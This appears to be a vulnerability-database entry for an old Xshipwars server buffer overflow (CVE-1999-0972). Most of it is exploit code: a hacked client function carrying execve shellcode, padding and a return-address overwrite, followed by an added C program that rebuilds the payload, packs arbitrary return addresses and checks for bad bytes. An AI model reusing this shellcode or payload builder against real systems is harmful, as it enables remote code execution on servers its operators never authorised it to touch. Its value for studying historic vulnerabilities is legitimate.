Xshipwars Buffer Overflow Vulnerability

Vulnerability ID: 1105640    Vulnerability type: Buffer overflow
Published: 1999-12-09    Updated: 2005-05-02
CVE ID: CVE-1999-0972
CNNVD ID: CNNVD-199912-041
Platform: Multiple    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/19667
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-041
|Vulnerability details
The xsw server program shipped with Xshipwars (versions before 1.25) has a remotely exploitable stack buffer overflow in its handling of the literal-command message (NET_CMD_EXEC). A crafted message overwrites the saved return address, and the exploit below executes arbitrary code with the UID of the server process.
|Exploit
/*
source: http://www.securityfocus.com/bid/863/info

Xshipwars is a graphical 'star battle' client/server based game which runs on a variety of platforms. Certain versions of the server which facilitates this game (versions before 1.25) had a remotely exploitable buffer overflow. The exploit would result in the execution of arbitrary commands as the UID of the server process. 
*/

/* If the offset is off for your box, then the server will still crash,
 and will begin an endless loop of sending itself log messages,
 filling up whatever space it can on whatever partition it's installed
 on. This is less than optimal behavior, so quickly find and kill the
 server if your exploit fails. 

       Love,
       A. Woodward, Dec 1999

<cut this and paste it into your client's source file, modify your
.h's to raise the limit on a few variables (grep for 256 and turn them
into 2560), recompile, and enjoy> */

/*
 *	Sends a literal command.
 */
/*hacked to send our attack buffer!*/
/* CS_MESG_MAX, CS_DATA_MAX_LEN, CS_CODE_LITERALCMD and NetSendData() are
   provided by the xsw client sources this function is pasted into. */

int 
NetSendExec(char *arg)
{
  char larg[CS_MESG_MAX];
  char sndbuf[CS_DATA_MAX_LEN];
  char exploitbuf[CS_DATA_MAX_LEN];
  int i;

  /*test shellcode. No whitespace, just exec's /tmp/xx. If it's not
    there, does random things. Replace this for slightly more
    fun. ;> */
  char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
                "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
                "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx";

  /* fill the attack buffer with 'A' padding */
#define SIZEOFBUF 229
  memset(exploitbuf, 0x41, SIZEOFBUF);

  /* drop the shellcode in after 50 bytes of padding */
#define SHELLSTART 50
  memcpy(exploitbuf + SHELLSTART, code, strlen(code));

  /*Return to: 0xbfffebe4 Your Kilometerage May Vary*/
  /* the saved return address sits 132 bytes in; write it little-endian */
  exploitbuf[132] = 0xe4;
  exploitbuf[133] = 0xeb;
  exploitbuf[134] = 0xff;
  exploitbuf[135] = 0xbf;

  /* terminate so the strncpy/sprintf below stop here */
  exploitbuf[SIZEOFBUF - 1] = 0;

  /*
  if(arg == NULL)
      return(-1);
  if(arg[0] == '\0')
      return(-2);
  */

  /* the real client copies the user's argument; send the attack buffer instead */
  /*strncpy(larg, arg, CS_MESG_MAX);*/
  strncpy(larg, exploitbuf, CS_MESG_MAX);
  larg[CS_MESG_MAX - 1] = '\0';

  /* 
   *   NET_CMD_EXEC format is as follows:
   *
   *      argument
   */
  sprintf(sndbuf, "%i %s\n",
          CS_CODE_LITERALCMD,
          larg
  );
  NetSendData(sndbuf);

  return(0);
}
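The exploit above hard-codes its layout in three numbers (229 bytes of filler, shellcode at offset 50, return address at offset 132) and sends the result through an unbounded sprintf. The following C is an added example, not part of the original exploit or of the xsw sources: it rebuilds the same payload from those constants, packs an arbitrary return address little-endian, and refuses an address or shellcode that contains a NUL or one of the separators used by the "%i %s\n" framing (NUL stops strncpy/sprintf; space and newline are the framing characters; rejecting tab and CR is an extra assumption of this example). The names first_bad_byte, build_payload, payload_ret_addr and frame_message are this example's own, and the numeric value of CS_CODE_LITERALCMD is not given on the page, so it is passed in as a parameter.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout constants copied from the exploit above. */
#define PAYLOAD_LEN   229   /* SIZEOFBUF: filler length, last byte becomes the NUL      */
#define SHELL_OFFSET   50   /* SHELLSTART: where the shellcode is placed                */
#define RET_OFFSET    132   /* byte at which the saved return address is overwritten    */
#define FILLER       0x41   /* 'A' padding                                              */

/* The exploit's 45-byte execve("/tmp/xx") shellcode, repeated so the block runs alone. */
static const unsigned char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx";
#define SHELL_LEN (sizeof(shellcode) - 1)

/* Index of the first byte that would break the message, or -1 if none.
 * NUL ends strncpy/sprintf early; ' ' and '\n' are the separators of the
 * exploit's own "%i %s\n" framing; tab and CR are an assumption here.
 * isspace() is deliberately not used: the shellcode carries 0x0b and 0x0c,
 * which isspace() would reject although the exploit ran with them. */
int first_bad_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char c = p[i];
        if (c == 0 || c == ' ' || c == '\n' || c == '\t' || c == '\r')
            return (int)i;
    }
    return -1;
}

/* Build the attack string: filler, shellcode at SHELL_OFFSET, little-endian
 * return address at RET_OFFSET, NUL terminator. Returns strlen(out), i.e. 228,
 * or -1 if out is too small or the address/shellcode contains a bad byte. */
int build_payload(unsigned char *out, size_t outlen, uint32_t ret_addr)
{
    unsigned char addr[4] = { ret_addr & 0xff, (ret_addr >> 8) & 0xff,
                              (ret_addr >> 16) & 0xff, (ret_addr >> 24) & 0xff };
    if (outlen < PAYLOAD_LEN)
        return -1;
    if (first_bad_byte(addr, 4) >= 0 || first_bad_byte(shellcode, SHELL_LEN) >= 0)
        return -1;
    memset(out, FILLER, PAYLOAD_LEN);
    memcpy(out + SHELL_OFFSET, shellcode, SHELL_LEN);
    memcpy(out + RET_OFFSET, addr, 4);
    out[PAYLOAD_LEN - 1] = '\0';
    return PAYLOAD_LEN - 1;
}

/* Read back the little-endian dword at RET_OFFSET, to check what was written. */
uint32_t payload_ret_addr(const unsigned char *p)
{
    return (uint32_t)p[RET_OFFSET] | (uint32_t)p[RET_OFFSET + 1] << 8 |
           (uint32_t)p[RET_OFFSET + 2] << 16 | (uint32_t)p[RET_OFFSET + 3] << 24;
}

/* Frame the payload the way NetSendExec does ("%i %s\n"), but with a bounded
 * snprintf instead of sprintf. Returns the wire length, or -1 if it would not
 * fit. 'code' stands in for CS_CODE_LITERALCMD, whose value the page omits. */
int frame_message(char *out, size_t outlen, int code, const unsigned char *payload)
{
    int n = snprintf(out, outlen, "%i %s\n", code, (const char *)payload);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

int main(void)
{
    unsigned char payload[PAYLOAD_LEN];
    char msg[512];
    int len = build_payload(payload, sizeof payload, 0xbfffebe4u);
    printf("payload length %d, return address 0x%08x\n", len, payload_ret_addr(payload));
    len = frame_message(msg, sizeof msg, 0, payload);   /* 0 = placeholder command code */
    printf("wire message length %d\n", len);
    return 0;
}
```

If the return address for your target has a 0x0a or 0x20 byte in it, build_payload returns -1 rather than silently sending a truncated message; that is the failure mode the exploit author warns about, where a wrong offset leaves the server crashing and looping on its own log messages.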
|References

Source: BID
Name: 863
Link: http://www.securityfocus.com/bid/863
